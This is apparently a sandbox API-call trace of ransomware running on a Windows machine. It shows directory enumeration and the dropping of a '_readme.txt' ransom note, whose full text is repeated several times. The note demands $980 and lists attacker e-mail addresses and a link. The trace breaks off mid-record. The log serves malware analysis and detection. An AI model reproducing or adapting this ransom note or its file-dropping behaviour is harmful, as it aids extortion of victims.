(in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa34c94a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34c94a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.988] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa34c94a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34c94a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.988] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0090.988] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34c94a0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa34c94a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34c94a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0090.988] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34c94a0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa34c94a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34c94a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0090.988] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.988] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175828 [0090.989] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.992] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.992] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.992] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.992] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.992] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.992] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.992] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.992] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.992] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0090.992] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0090.992] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.992] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.992] PathFindFileNameW (pszPath="") returned="" [0090.992] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.993] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.993] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.993] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.993] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.993] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0090.993] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175990 | out: hHeap=0x680000) returned 1 [0090.993] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0090.993] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.993] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175990 | out: hHeap=0x680000) returned 1 [0090.993] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 0 [0090.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.994] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.994] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99cad78 [0090.994] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0090.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x3189d50 [0090.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x3189d50, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0090.995] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.995] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.995] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.995] WriteFile (in: hFile=0x5cc, lpBuffer=0x316f0d0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x316f0d0*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.996] CloseHandle (hObject=0x5cc) returned 1 [0090.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99cad78 | out: hHeap=0x680000) returned 1 [0090.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175990 [0090.996] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa34c94a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34c94a0, 